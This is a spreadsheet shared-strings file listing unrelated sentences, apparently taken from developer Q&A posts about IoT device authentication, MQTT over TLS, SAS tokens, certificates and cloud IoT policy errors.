Note: For production sites you need to buy valid SSL certificates from a trusted authority.</t>
  </si>
  <si>
    <t>Once the Event will be sent to Cloud IOT-HUB from Device thru Device Node.JS sdk, once message is received on IOT-Hub same needs to be acknowledged to nodejs.</t>
  </si>
  <si>
    <t>If the wso2carbon.log I see this error message on step 7:
TID: [-1234] [] [2018-02-21 17:43:14,263]  WARN {org.owasp.csrfguard.log.JavaLogger} -  potential cross-site request forgery (CSRF) attack thwarted (user:, ip:127.0.0.1, method:POST, uri:/publisher/api/mobileapp/upload, error:required token is missing from the request) {org.owasp.csrfguard.log.JavaLogger}
I see no error messages on clicking "Create".</t>
  </si>
  <si>
    <t>At the moment, I believe that the client software needs to have an intermediate certificate embedded, which it can use to sign a certificate that it creates when it attempts to provision itself.</t>
  </si>
  <si>
    <t>Then there is the differences in security mechanisms and message routing (see the docs) so if using the Event Hub needs your requirements i'd say give it a go.</t>
  </si>
  <si>
    <t>About Common parameters and headers, only Authorization header is required and it is the same with in the POST request.</t>
  </si>
  <si>
    <t>What I do jet is, I have create a certificate-chain with openssl and generate a X509-certificat.</t>
  </si>
  <si>
    <t>The Internet Content Adaptation Protocol (ICAP) is a lightweight HTTP-like protocol used to extend transparent proxy servers that are focused on a specific function (ad insertion, virus scanning, content translation, content filtering, etc.).</t>
  </si>
  <si>
    <t>First the address was not resolving, so I added www in front of googleapis, then it was complaining that SSL was required so I added https in front, then it complained about the certificate so I added the -k parameter and finally it was trying to resolve Bearer and my access tokens as addresses so I used double quotes instead of single quotes.</t>
  </si>
  <si>
    <t>I am successfully connecting to Azure IoT Hub using the same M2MQTT library in C# but this code fails with:
Failed to connect.Connection refused, not authorized.</t>
  </si>
  <si>
    <t>I don't see it documented in the Python SDK docs, but in the Java SDK docs it says:
clientId - the client ID uniquely identify a MQTT connection.</t>
  </si>
  <si>
    <t>When you upload an intermediate certificate, the ONLY thing that is uploaded is the cert itself, not the entire chain from root to intermediate.</t>
  </si>
  <si>
    <t>npm assumes @scope/ packages to be private when published, however @ scoped packages can also be published publicly too.</t>
  </si>
  <si>
    <t>It can capture performance data for web apps (via the HAR format), as well as manipulate browser behavior and traffic, such as whitelisting and blacklisting content, simulating network traffic and latency, and rewriting HTTP requests and responses.</t>
  </si>
  <si>
    <t>The default value is 0, which means that all valid MQTT
  messages are accepted.</t>
  </si>
  <si>
    <t>We observe "Bad Certificate" error thrown by client on wire shark error.</t>
  </si>
  <si>
    <t>It allows your client to verify the other end of the connection as an IoT hub.</t>
  </si>
  <si>
    <t>From W3C
XML Schema:Structures introduces a mechanism for signaling that an element should be accepted as "valid" when it has no content despite a content type which does not require or even necessarily allow empty content.</t>
  </si>
  <si>
    <t>[info] [Client &lt;0.36.0&gt;] connected with wss://6xxxxx.messaging.internetofthings.ibmcloud.com:443
[warning] [Client &lt;0.36.0&gt;] Connection lost for: ssl_closed when state is waiting_for_connack
Message : {ssl_closed, {sslsocket, {gen_tcp,#Port&lt;0.3922&gt;,tls_connection,undefined}, &lt;0.74.0&gt;}}
Why am I receiving ssl_closed after getting connected?</t>
  </si>
  <si>
    <t>The cloud interface only allows secure websocket ( HTTP, non-secure websocket etc are not allowed)
I tried the latest master,dev builds from nodemcu-build.com , but there  SSL is failing.</t>
  </si>
  <si>
    <t>How will I send that custom payload from the device to the DPS at the time of registering itself, so I can get that payload in my Azure Function and can take a decision?</t>
  </si>
  <si>
    <t>You can use a field gateway to add the necessary authorisation to a request on behalf of your device - for more information see https://azure.microsoft.com/documentation/articles/iot-hub-gateway-sdk-physical-device/</t>
  </si>
  <si>
    <t>After the redirect, the presence of the flash scope cookie will be checked and the data entry associated with the cookie will be removed from the session scope and be put in the request scope of the redirected request.</t>
  </si>
  <si>
    <t>This throws an unauthorized exception
var client = new MobileServiceClient("THE URL");
            var authenticationResult = await ServicePrincipal.GetS2SAccessTokenForProdMSA();
            var authHeader = new Dictionary&lt;string, string&gt; { { "Bearer", authenticationResult.AccessToken } };
            var orderResult = await client.InvokeApiAsync("News", HttpMethod.Get, authHeader); 
I also tried the following, which doesn't work either.</t>
  </si>
  <si>
    <t>Regarding AT document
Requesting Permissions at Runtime is not supported because embedded
  devices aren't guaranteed to have a UI to accept the runtime dialog.</t>
  </si>
  <si>
    <t>Thanks in advance
UPDATE
I've been able to authenticate in the server doing a workaround, using the net library instead of the http and sending Connection: keep-alive headers.</t>
  </si>
  <si>
    <t>I have MQTT broker on my Raspberry pi, all certificates are correctly inserted (everything working fine with Paho Client on same raspberry or with Mqtt.fx client on remote PC), but when I try to connect from my ESP8266 with nodeMCU I am getting SSL handshake error (yes, I am using same cert file for all mentioned clients).</t>
  </si>
  <si>
    <t>Using an old cell phone and a SIM card you can easily receive messages without the need for the network shield nor gsm shield
http://www.power7.net/GSM_tutorial.html</t>
  </si>
  <si>
    <t>http://username:password@members.dyndns.org/nic/update?hostname=yourhostname&amp;myip=ipaddress&amp;wildcard=NOCHG&amp;mx=NOCHG&amp;backmx=NOCHG
Raw HTTP GET Request
Actual HTTP request should look like following fragment.</t>
  </si>
  <si>
    <t>An HTTP Proxy is a server that receives requests from your web browser and then makes the request to the Internet on your behalf.</t>
  </si>
  <si>
    <t>IWA is also known by several names like HTTP Negotiate authentication, NT Authentication, NTLM Authentication, Domain authentication, Windows Integrated Authentication, Windows NT Challenge/Response authentication, or simply Windows Authentication.</t>
  </si>
  <si>
    <t>BTW, the format of SAS token for device is , while the format of SAS token for IoT Hub is /^SharedAccessSignature sr=iot-hub-test.azure-devices.net&amp;sig=.+&amp;skn=iothubowner&amp;se=.+$/</t>
  </si>
  <si>
    <t>The device needs to present its entire certificate chain for DPS to provision the device successfully.</t>
  </si>
  <si>
    <t>Basically i've got to the point where i try to go to the admin page of web2py, and this should be achieved by accessing the pi's through an ssl connection (through ), but when i try to do this, all i get is an error in google chrome: Error code: ERR_SSL_PROTOCOL_ERROR
It must have something to do with the SSL key that for some reason i'm not getting... i have configured a key using openssl req -new -key ca.key -out ca.csr and the files have been generated on the server side (raspberry), but i dont know what to do with them...</t>
  </si>
  <si>
    <t>The main reason I got handshake failed error is that the Arduino cannot read the "Sec-WebSocket-Accept" header of the handshake response message (as many other headers also) which I made sure that they are sent, by debugging code on the server.</t>
  </si>
  <si>
    <t>and:
mosquitto_sub \
--host mqtt.googleapis.com \
--port 8883 \
--id ${LONG_REGISTRY}/devices/${DEVICE} \
--username unused \
--pw ${PASSWORD} \
--cafile /roots.pem \
--tls-version tlsv1.2 \
--protocol-version mqttv311 \
--debug \
--qos 1 \
--topic /devices/${DEVICE}/config
Where:
LONG_REGISTRY=projects/${PROJECT}/locations/${REGION}/registries/${REGISTRY}
And, answering my questions:
The Mosquitto tools installed on the Onion Omega2 support TLS
I (assume) the OpenWRT Mosquitto client is outdated; it's different
Yes, the examples above demo pub'ing and sub'ing using Cloud IoT
I am a Googler not in Cloud IoT and I think I most need Mosquitto help.</t>
  </si>
  <si>
    <t>The permissions of the role and the passed policy are intersected, not merged:
https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_control-access_assumerole.html
If the starting role does not have any permission, then the same is true for the aasumed role.</t>
  </si>
  <si>
    <t>The easiest way to do it is to do it from the Azure Cloud CLI  (in the azure portal, click on the "&gt;_" button up in the top nav bar..  then you can run this command:
az iot hub generate-sas-token -n [your iothub name] --policy device --key-type primary --duration [duration in seconds you want the token to be valid]
Try using that SAS token.</t>
  </si>
  <si>
    <t>Related links
Overview: https://www.yubico.com/applications/fido/
FIDO specs: https://fidoalliance.org/specifications/overview/
GitHub U2F docs: https://help.github.com/articles/configuring-two-factor-authentication-via-fido-u2f/</t>
  </si>
  <si>
    <t>The configuration i gave in MQTT in node-red are ::
server - AWS Iot -&gt; settings -&gt; endpoint
port - 8883
Enable secure (SSL/TLS) connection - True (upload all certificates)
Topic - "sample"
And deployed but always it shows disconnected.</t>
  </si>
  <si>
    <t>Below is the content of this file:
print (tls.cert.verify([[
-----BEGIN CERTIFICATE-----
cert here
-----END CERTIFICATE-----
]]))
It prints 'true'.</t>
  </si>
  <si>
    <t>Tokenizing is the act of splitting a stream of text into discrete elements called tokens using a delimiter present in the stream.</t>
  </si>
  <si>
    <t>[http @ 0x343cee0] Setting default whitelist 'http,https,tls,rtp,tcp,udp,crypto,httpproxy'
[http @ 0x343cee0] request: GET /live HTTP/1.1
User-Agent: Lavf/57.31.100
Accept: */*
Range: bytes=0-
Connection: close
Host: 127.0.0.1:8000
Icy-MetaData: 1
[mp3 @ 0x343c7e0] Format mp3 probed with size=262144 and score=50
[mp3 @ 0x343c7e0] Skipping 656 bytes of junk at 0.</t>
  </si>
  <si>
    <t>Accepts HTTP and HTTPS requests
Integrates and protects back-end server resources through WebSEAL junction technology
Manages fine-grained access control for the local and back-end server Web space
Supported resources include URLs, URL-based regular expressions, CGI programs, HTML files, Java servlets, and Java class files.</t>
  </si>
  <si>
    <t>Security Cam: http://www.jay-tech.de/jaytech/servlet/frontend/content.html?articleOID=d583e45:-495a2735:120c7c04348:446c&amp;keywordOID=d583e45:946c233:1182e6a651d:e4e.</t>
  </si>
  <si>
    <t>When I did not provide the id token, I got message: unauthorized as a response.</t>
  </si>
  <si>
    <t>The same certs work fine with node.js client hence I know certs are fine, just some config in mosquitto client which is erroneous.</t>
  </si>
  <si>
    <t>2018-12-20 00:42:53,571 ERROR --- MqttFX ClientModel             : Error when connecting
org.eclipse.paho.client.mqttv3.MqttSecurityException: Not authorized to connect
    at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:28) ~[org.eclipse.paho.client.mqttv3-1.2.0.jar:?]</t>
  </si>
  <si>
    <t>org.eclipse.paho.client.mqttv3.MqttSecurityException: Not authorized to connect
    at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:28) ~[org.eclipse.paho.client.mqttv3-1.2.0.jar:?]</t>
  </si>
  <si>
    <t>Because once user authenticated then the user can attach any policy by just specifying the policy name.</t>
  </si>
  <si>
    <t>I am trying to  Azure IoT edge security daemon code (edgelet) in a docker.</t>
  </si>
  <si>
    <t>In this scenario, only the identity of the gateway is known by IoT Hub.</t>
  </si>
  <si>
    <t>The token is on the gateway and is used to authenticate and autorize the gateway.</t>
  </si>
  <si>
    <t>To connect to the IoT platform with an IAM user (MQTT over WSS), you do not only need an IAM policy which allows access, but also an IoT policy which does so.</t>
  </si>
  <si>
    <t>You should look at the file certs.c in the Azure IoT SDK.</t>
  </si>
  <si>
    <t>This module lets you authenticate HTTP requests using JWT tokens, in your Node.js applications.</t>
  </si>
  <si>
    <t>Following the samples on the AMQP lite github page, I have successfully connected using SASL ANONYMOUS then token on $cbs endpoint.</t>
  </si>
  <si>
    <t>Tracekit is a JavaScript library that automatically normalizes and exposes stack traces for unhandled exceptions across the 5 major browsers: IE, Firefox, Chrome, Safari, and Opera.</t>
  </si>
  <si>
    <t>I can get certificates with:
When I have add (thank you @MarcelStr for hint, I have tried previously net.cert.verify)
tls.cert.verify([[
-----BEGIN CERTIFICATE-----
MIIGsTCCBJmgADJKJFdWgAIQF5Koy/50vI3cQAAAAhAXjANBgkqhkiG9w0BAQsF
......
lz3ZDUcyzRgG6TRtA3SjASEUlJMt3f7xuI2nNpt8p5gy9pXuRw==
-----END CERTIFICATE-----
]])
tls.cert.verify(true)
I'v received another error:
Error Connecting: -5
UPDATE:
There is another similar topic, and I have set time, but still without result.</t>
  </si>
  <si>
    <t>The runtime only knows how to build a connection string that contains the hostname of your IoT hub:
To connect to another edge device instead of your IoT hub, the connection string would need an additional piece of information--the hostname of the other edge device:
HostName=&lt;hub&gt;;DeviceId=&lt;device&gt;;SharedAccessKey=&lt;secret&gt;;GatewayHostName=&lt;edge&gt;
Because of the connection string, the edge device can only communicate with IoT Hub in the cloud, not the IoT Hub-like interface of another edge device.</t>
  </si>
  <si>
    <t>ESP8266-transparent-bridge
This is really basic firmware for the ESP that creates a totally
  transparent TCP socket to ESP UART0 bridge.</t>
  </si>
  <si>
    <t>In this situation I find your approach reasonable: the server simply tells the client using an insecure transport that there is some message awaiting (i.e.</t>
  </si>
  <si>
    <t>I am using node red (node-red-contrib-azure-iot-hub) to register the new devices on Azure IoT Hub.</t>
  </si>
  <si>
    <t>Here are few scripts which are run, where I have replaced org, type, id and token with dummy values
Response
HTTP 403 forbidden
When I try to get the role of device, it works fine
Response
{
  "results": [
    {
      "roleId": "PD_PRIVILEGED_GW_DEVICE",
      "roleStatus": 1
    }
  ],
  "rolesToGroups": {}
}</t>
  </si>
  <si>
    <t>If yes, i don't understand the benefit of registering each device on the HuB
Must I listen each connected device route inside my gateway (i.e
/devices/DeviceA/messages for Edge1) ?</t>
  </si>
  <si>
    <t>You still can use AWS v4 signatures (https://docs.aws.amazon.com/iot/latest/developerguide/iam-users-groups-roles.html) so the suggestion is that you're not forming the request properly.</t>
  </si>
  <si>
    <t>A user-agent is a string in the header of an HTTP request that helps to identify the browser, version, device, operating system and other information about the device from which the request originated.</t>
  </si>
  <si>
    <t>These protections
have been proven insecure under a combination of browser plugins and
redirects which can allow an attacker to provide custom HTTP headers
on a request to any website, hence allowing a forged request.</t>
  </si>
  <si>
    <t>When creating a device in DeviceIdentityRegistry in Azure IoTHub, we get Shared Access Key(DeviceKey) for the device to connect to IotHub, does this Shared Access Key(DeviceKey) expire?</t>
  </si>
  <si>
    <t>See: https://urllib3.readthedocs.org/en/latest/security.html
Warning (from warnings module):
File "C:\PROGS\Python27\lib\site-packages\requests\packages\urllib3\connectionpool.py", line 789
InsecureRequestWarning)
InsecureRequestWarning: Unverified HTTPS request is being made.</t>
  </si>
  <si>
    <t>I shoould note that I have soldered three wires onto the UART pins:
RPi3 UART pins http://www.embeddedforu.com/wp-content/uploads/2015/06/Raspberry-pi-UART-connections_thumb.png
When the system is frozen, I can still ping the device, but SSH does not work.</t>
  </si>
  <si>
    <t>(In endpoints of my machine I've added 1883 for HTTP, 443 for HTTPS and 22 for SSH)
My question is how I can allow multiple devices to communicate with MQTT broker running on Azure broker?</t>
  </si>
  <si>
    <t>HTTP request sent, awaiting response... 
After some research, the root cause seems to be, that the receive callback is registered after the first data was received from the client.</t>
  </si>
  <si>
    <t>I have tried restricting the Policies to only allow access to things named , but this seems to depend on setting the clientId of all connections to the thing name  which breaks because you can't have two clients connected with the same clientId.</t>
  </si>
  <si>
    <t>");
    delay(1000);
}
Serial.println();
Serial.println("Connected to mqtt");
but it never connects
I verified the google certificate by calling 
openssl s_client -showcerts -connect mqtt.googleapis.com:8883
and I put in my RSA Private key and certificate key that was made
wifi.setCACert(googleCertificate2);
wifi.setCertificate(myCertificate);
wifi.setPrivateKey(privateCert);
What am I doing wrong?</t>
  </si>
  <si>
    <t>I'm working on a project to connect BLE sensors via Minew G1 gateway to Azure IoT Hub, however I'm having trouble registering the device in IoT Hub and establishing the connection from the Minew G1.</t>
  </si>
  <si>
    <t># The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.</t>
  </si>
  <si>
    <t>This link http://techqa.info/programming/question/40301345/connect-to-AWS-IoT-using-web-socket-with-Cognito-authenticated-users was very helpful for integration
Hope this helps!</t>
  </si>
  <si>
    <t>A few notes:
Your password will expire after 3600 seconds
I had to enable TLS 1.3 from the dialog before connecting using MQTT.fx
After you connect, you will only be able to publish to device-specific topics and only will be able subscribe to device-specific configuration changes.</t>
  </si>
  <si>
    <t>However, you could implement a hack by sending a message on connect/disconnect from the device that you have a Cloud Function subscribed to the Pub/Sub topic listening for.</t>
  </si>
  <si>
    <t>After some more troubleshooting, it was related to the authentication configuration - the client (Arduino) was trying to connect anonymously (with no password), while the broker (Pi) was set up to only allow authenticated connections (allow_anonymous false in the MQTT configuration).</t>
  </si>
  <si>
    <t>The client secure socket will reject the connection during the SSL session handshake if the target HTTPS server attempts to authenticate itself with a non-trusted certificate.</t>
  </si>
  <si>
    <t>HTTP Live Streaming is capable of traversing any firewall or proxy server that lets through standard HTTP traffic, unlike UDP-based protocols such as RTP.</t>
  </si>
  <si>
    <t>Hello World #1 (post-process a request)
Post-processing a request such as submitting and validating a POST form is the most commonly known use case for a servlet.</t>
  </si>
  <si>
    <t>To get started:
Get your example token at developer.here.com
Replace "YOUR-XYZ-TOKEN" in the following code chunk and copy it in an empty index.html file.</t>
  </si>
  <si>
    <t>A reverse proxy server usually refers to an proxy server which proxies requests on behalf of the actual clients to one or more backend HTTP servers.</t>
  </si>
  <si>
    <t>1) Network errors: disconnected socket and name resolution errors
2) Protocol-level errors for HTTP, AMQP, and MQTT transport: detached links or expired sessions
3) Application-level errors that result from either local mistakes: invalid credentials or service behavior (for example, exceeding the quota or throttling)
The device SDKs detect errors at all three levels.</t>
  </si>
  <si>
    <t xml:space="preserve"> uses node-raw-socket which needs root access to create its raw sockets.</t>
  </si>
  <si>
    <t>Accepting an attacker's public key without validation will authorize an unauthorized attacker as a valid user.</t>
  </si>
  <si>
    <t>Here's the translation:
Internet (Client &amp; Server)
Internet (Client)
Private Networks (Client &amp; Server)
Enterprise Authentication
But then I get this Response from the webservice:
Translated it means:
401 - Unauthorized: Access denied due to invalid credentials.</t>
  </si>
  <si>
    <t>To specify a BOM and determine whether an exception is thrown on invalid bytes, use a constructor that accepts an encoding object as a parameter, such as StreamWriter(String, Boolean, Encoding) or StreamWriter.</t>
  </si>
  <si>
    <t>libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.</t>
  </si>
  <si>
    <t>See the following information from the Watson IoT platform documentation here
Key Info:
When you register a Device with the Watson IoT platform, the  , Device Id, and Device Authentication Token are then used to connect the device via MQTT:
hostname will be &lt;your-org-id&gt;.messaging.internetofthings.ibmcloud.com
port can be 8883 or 433 for Secure (TLS), or 443 for Non-secure (if your Watson IoT settings allow for TLS Optional connections
clientId for devices is of the form d:orgId:deviceType:deviceId
username is use-token-auth
password is the Device Authentication Token chosen (or generated) when the device was registered in the Watson IoT Platform</t>
  </si>
  <si>
    <t>[    3.743064] systemd-journald[85]: Received request to flush runtime journal from PID 1
[    4.791472] smsc95xx 1-1.1:1.0 eth0: hardware isn't capable of remote wakeup
Arch Linux 4.1.18-v7+ (ttyS0)
alarmpi login: 
Arch Linux 4.1.18-v7+ (ttyS0)
alarmpi login: root
Password: 
Welcome to Arch Linux ARM
     Website: http://archlinuxarm.org
       Forum: http://archlinuxarm.org/forum
         IRC: #archlinux-arm on irc.Freenode.net
[   15.258407] random: nonblocking pool is initialized
I hope this gives you enough of a general idea on how to approach this.</t>
  </si>
  <si>
    <t>..which leads us to to the code that does the authentication : ftp://ftp.tuwien.ac.at/.vhost/winpcap.polito.it/301a/docs/daemon_8c-source.html#l00626
I downloaded the source (http://www.winpcap.org/install/bin/WpcapSrc_4_1_3.zip) to check it was still current and found in file "wpcap\libpcap\rpcapd\daemon.c" the current information for "daemon_AuthUserPwd" which shows not much has changed.</t>
  </si>
  <si>
    <t>I am trying to create an iota transaction bundle in C for Arduino devices and created therefore a github repository:
https://github.com/Xplosio2/Iota-transaction-in-C
The code is compiling successfully, however the Arduino is making some encrypted outputs that doesn't make any sense.</t>
  </si>
  <si>
    <t>The API in the code is the above API (taken from Google Cloud Messaging HTTP Error 400: Bad Request)
import json
My issues and questions:
When I am running the above code from RPi I am getting 'Authorization Error 401'.</t>
  </si>
  <si>
    <t>here is the param : 
Set the Authorization header to a SAS token created as specified in the service section of Using IoT Hub security tokens.</t>
  </si>
  <si>
    <t>but when ionic updated console giving me this error for my data apis = 
no 'access-control-allow-origin' header is present on the requested resource.</t>
  </si>
  <si>
    <t>do I need to register new device through this node every time or we can register new device directly in Azure IoT hub?</t>
  </si>
  <si>
    <t>You need to create MQTT client using https://github.com/aws/aws-iot-device-sdk-js and providing your temporary accessKeyId, secretKey and sessionToken received from Extended Flow authentication.</t>
  </si>
  <si>
    <t>Can you try:
url: 
port:8883
username: use-token-auth
password: [the token you got when you created the device]
client id: d:[orgID]:[mydevicetype]:[mydeviceid]
Looks like not much different from what you've tried, perhaps your are not using a secure (mqtts) connection ?</t>
  </si>
  <si>
    <t>Tracekit is a JavaScript library that automatically normalizes and exposes stack traces for unhandled exceptions across the major browsers.</t>
  </si>
  <si>
    <t>AsyncWebServerRequest can read form values for you, so all you have to do is implement the correct handler on your server:
server.on("/login", HTTP_POST, [](AsyncWebServerRequest *request) {
  if (!request-&gt;hasParam("networkName", true) || !request-&gt;hasParam("networkPassword", true)) {
    request-&gt;send(400, "Missing fields");
    return;
  }
  const char *networkName = request-&gt;getParam("networkName")-&gt;value().c_str();
  const char *networkPassword = request-&gt;getParam("networkPassword")-&gt;value().c_str();
  // Do stuff with networkName and networkPassword
  // ...
  // Redirect to new page
  request-&gt;redirect("/whatever");
});</t>
  </si>
  <si>
    <t>is correct:
But if credentials is wrong, then I get:
events.js:160
      throw er; // Unhandled 'error' event
      ^
Error: getaddrinfo ENOTFOUND 1234xyz.messaging.internetofthings.ibmcloud.com 1234xyz.messaging.internetofthings.ibmcloud.com:8883
    at errnoException (dns.js:28:10)
    at GetAddrInfoReqWrap.onlookup [as oncomplete] (dns.js:76:26)
error: Forever detected script exited with code: 1
How do I correctly catch this error in a nice way?</t>
  </si>
  <si>
    <t>I've tried putting the certs in various directories, ~/, ~/.node-red/, ~/.node-red/certs/ etc but always get the same error
Does anyone know where is the correct place for the certs, and what is the correct corresponding key path for the aws-iot-broker node Security tab settings?</t>
  </si>
  <si>
    <t>Then, I would read up on CoreTelephony private methods:
https://github.com/EthanArbuckle/IOS-7-Headers/tree/master/Frameworks/CoreTelephony.framework</t>
  </si>
  <si>
    <t>Create a client object using Client.fromSharedAccessSignature and build a long-lived signature that does not require disconnecting and reconnecting as often.</t>
  </si>
  <si>
    <t>The server generating a 401 response MUST send a WWW-Authenticate header field1 containing at least one challenge applicable to the target resource.</t>
  </si>
  <si>
    <t>i got a prompt over https to accept the cert.</t>
  </si>
  <si>
    <t>Access is done via HTTPS without active SSL authentification when doing the request.</t>
  </si>
  <si>
    <t>Can I authorize a device using SSL certificate to send data to IOT HUB.</t>
  </si>
  <si>
    <t>However, when I try to Authorize the Google Assistant SDK sample, I get the error described in the title.</t>
  </si>
  <si>
    <t>I checked connect to AWS IoT using web socket with Cognito authenticated users, but it didn't help.</t>
  </si>
  <si>
    <t>I used that id token in POSTMAN along with Authorization header and the post worked.</t>
  </si>
  <si>
    <t>It gets created But when I am trying to create device, I got unauthorized exception.</t>
  </si>
  <si>
    <t>Below is the Screenshot for the same
SAS token I am using in my code is
sas_token ="SharedAccessSignature sr=PuneODCIOTHub.azure-devices.net%2Fdevices%2FMyDotnetDevice&amp;sig=KqyeH0n2kez3Zyz3%2BnVnOVyAsG%2F65MYO95%2FrgdJjBzI%3D&amp;se=1536300480"
Any help will be appreciated.</t>
  </si>
  <si>
    <t>I got the same error using use-token-auth as the user and the token as password.</t>
  </si>
  <si>
    <t>For this I have to attach policy to the authenticated cognito identity.</t>
  </si>
  <si>
    <t>The policy im attaching has the access to connect and subscribe device shadow.</t>
  </si>
  <si>
    <t>Set up X.509 security in your Azure IoT hub
How can we do this in C#?</t>
  </si>
  <si>
    <t>When I make http requests to the Cloud IoT api, I get a 403 "forbidden' error.</t>
  </si>
  <si>
    <t>A transparent gateway is one where the device's identity (ie: GPS device) is known by IoT Hub.</t>
  </si>
  <si>
    <t>As you pointed out, this means you need a way to update the device with a token that IoT Hub can use to authenticate and authorize the device.</t>
  </si>
  <si>
    <t>I just tried with AMQP and got an authorization error when the SAS expired, same happens with HTTP.</t>
  </si>
  <si>
    <t>A device ("use-token-auth" authentication type) cannot subscribe to a topic like "iot-2/evt/status/fmt/json" only "iot-2/cmd/status/fmt/json" is allowed.</t>
  </si>
  <si>
    <t>You can use Device Explorer to generate SAS tokens,please see the device section of Using IoT Hub security tokens.</t>
  </si>
  <si>
    <t>There are few more steps from now
Attach IoT policy to the Authenticated Pool.</t>
  </si>
  <si>
    <t>Use a leaf PFX when authenticating with the Provisioning service.</t>
  </si>
  <si>
    <t>See the docs here:
https://docs.aws.amazon.com/iot/latest/developerguide/authorization.html</t>
  </si>
  <si>
    <t>The legacy API keys that you get from your console are long-lived but will only authorize requests to the legacy API.</t>
  </si>
  <si>
    <t>A Java library for authenticating HTTP Requests using OAuth</t>
  </si>
  <si>
    <t>Client does not support authentication protocol requested by server; consider upgrading MySQL client</t>
  </si>
  <si>
    <t>A challenge-response authentication mechanism for HTTP</t>
  </si>
  <si>
    <t>Many blog posts on the code can be found on Dominic's blog - leastprivilege.com.</t>
  </si>
  <si>
    <t>A channel is a component that processes a WCF message in some way, for example, by authenticating a message.</t>
  </si>
  <si>
    <t>Instead of the application authenticating the client, the client is redirected to an STS.</t>
  </si>
  <si>
    <t>The STS authenticates the client and issues a security token.</t>
  </si>
  <si>
    <t>The Store and Forward blog covers MQ Security topics in depth.</t>
  </si>
  <si>
    <t>Here is my setup:
I have a lambda function which creates a signed url using STS assumeRole (permissions in policy will be tighter but I have allowed access to all iot functions on all resources for testing):
};
The RoleArn provided here has the following policy:
}
I am using mqtt-elements in a Polymer project for my frontend code.</t>
  </si>
  <si>
    <t>Optional SOAP element that represents a header that contains application-specific information (like authentication, payment, etc) about the SOAP message.</t>
  </si>
  <si>
    <t>However, I keep getting error code 401 with error message "message": "Request had invalid authentication credentials.</t>
  </si>
  <si>
    <t>Laravel Requests - handling request and Request validation</t>
  </si>
  <si>
    <t>Note
I was needed to add 
  &lt;system.net&gt;
&lt;settings&gt;
  &lt;httpWebRequest useUnsafeHeaderParsing="true"/&gt;
&lt;/settings&gt;
in .NET 4.5 Client because otherwise I got an exception The server committed a protocol violation.</t>
  </si>
  <si>
    <t>On my first try, the above code showed "es-ES" language pack but, when trying to use the TTS it threw an exception: 
So, I did a fresh install again, copied again the files but, this time shows this: 
Exception thrown: 'System.InvalidOperationException' in System.Linq.dll.</t>
  </si>
  <si>
    <t>However, it works properly when I have the following policy attached to the certificate (and certificate in turn to device) -
I want to have a generic and strict policy (especially for publish and receive actions) than granting rights to all i.e.</t>
  </si>
  <si>
    <t>The openssl github page says that an "illegal instruction" may occur from the no-sse2 parameter when installing openssl as seen in the 'INSTALL' file from their github page.</t>
  </si>
  <si>
    <t>HTTP request sent, awaiting response... 401 Unauthorized
  Authentication selected: Basic realm="Google Domains Dynamic Dns (www.systemcamera.org)"
  Reusing existing connection to domains.google.com:443.</t>
  </si>
  <si>
    <t># since I don't know if the policy service is relevant
  # for unauthenticated mail, I commented it out here
  # check_policy_service inet:127.0.0.1:10031
  warn_if_reject reject_non_fqdn_hostname
  warn_if_reject reject_non_fqdn_sender
  reject_invalid_hostname
  reject_unknown_sender_domain
smtpd_data_restrictions = reject_unauth_pipelining
# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.</t>
  </si>
  <si>
    <t>One is a client that subscribes to a broker to listen for messages as well as push data to the server, the other is a BLE scanner that scans and reads data from certain peripherals.</t>
  </si>
  <si>
    <t>For example:
Do as outlined here to add as trusted host, http://ms-iot.github.io/content/en-US/win10/samples/PowerShell.htm
Then, assuming your IP was 10.10.0.1,
set-executionpolicy remotesigned
import-module NetTCPIP
New-NetIPAddress -InterfaceAlias "Ethernet" IPAddress 10.10.0.1 -AddressFamily IPv4 PrefixLength 16 -DefaultGateway 10.10.0.2</t>
  </si>
  <si>
    <t>Update:
Generate the root ca certificate file with the command(testRootCert_cert.pem,testRootCert_fullchain.pem,testRootCert_key.pem would be genetated in tools folder):
node create_test_cert.js root
Add a certificate named "root"  in Certificates, and upload the root ca file(testRootCert_cert.pem).</t>
  </si>
  <si>
    <t>My Question has been answered here https://github.com/Azure/iotedge/issues/60 
The idiomatic way to encrypt/decrypt data in an iot edge module at the moment seems to be to communicate with the daemon via a unix socket (see env var IOTEDGE_WORKLOADURI)</t>
  </si>
  <si>
    <t>AWS IoT does not support persistent sessions (clean session flag = 0) so it will not remember subscribed clients or undelivered messages after a client disconnects.</t>
  </si>
  <si>
    <t>Here is the tricky part: the credentials you get by exchanging your user pool credential is just a temporary credential that represent the AWS IAM policy you just attached to your identity pool!</t>
  </si>
  <si>
    <t>Azure Web Application Firewall adds better web application security to layer 7 Azure Application Gateway service and is available in all Azure public regions.</t>
  </si>
  <si>
    <t>Including photographs, videos, face detection and barcode scanning
Github: https://github.com/react-native-community/react-native-camera
Docs: https://github.com/react-native-community/react-native-camera/blob/master/docs/RNCamera.md</t>
  </si>
  <si>
    <t>I generated the token for the authorization header with the Azure Device Explorer as you can see in the picture below.</t>
  </si>
  <si>
    <t>The following is an example of the first step such as a getting a reference info for uploading file:
Note, that the steps 1. and 3. require a sas token for Azure IoT Hub Authorization.</t>
  </si>
  <si>
    <t>Here are the some important input details configured for Steam Analytics job are
Event Serialization format: JSON
Encoding :utf-8
The message is sent to IOT Hub from Dotnet simulated code.</t>
  </si>
  <si>
    <t>there are a couple things I can see in your code:
when concatenating the string to create the token there's a  that should be a +
the way you generate the hmac hash: we don't use 'toString('binary') on the base64 encoded buffer containing the password (shouldn't be an issue with node, will be an issue if you're trying to use browserify):
(reference: authorization.js)
From the screenshot of the error it looks like you're already using the node.js SDK, have you tried using the SharedAccessSignature.create(...) method of either the Device SDK or the Service SDK (depending on what you're trying to achieve?)</t>
  </si>
  <si>
    <t>My problem is that Azure Iot Hub requires a SAS string in the Authorization header, but I can not find a way to add this header.</t>
  </si>
  <si>
    <t>But when the message is being processed by the Back End it takes the unique id from the payload and therefore knows which is the correct device that sent the telemetry.</t>
  </si>
  <si>
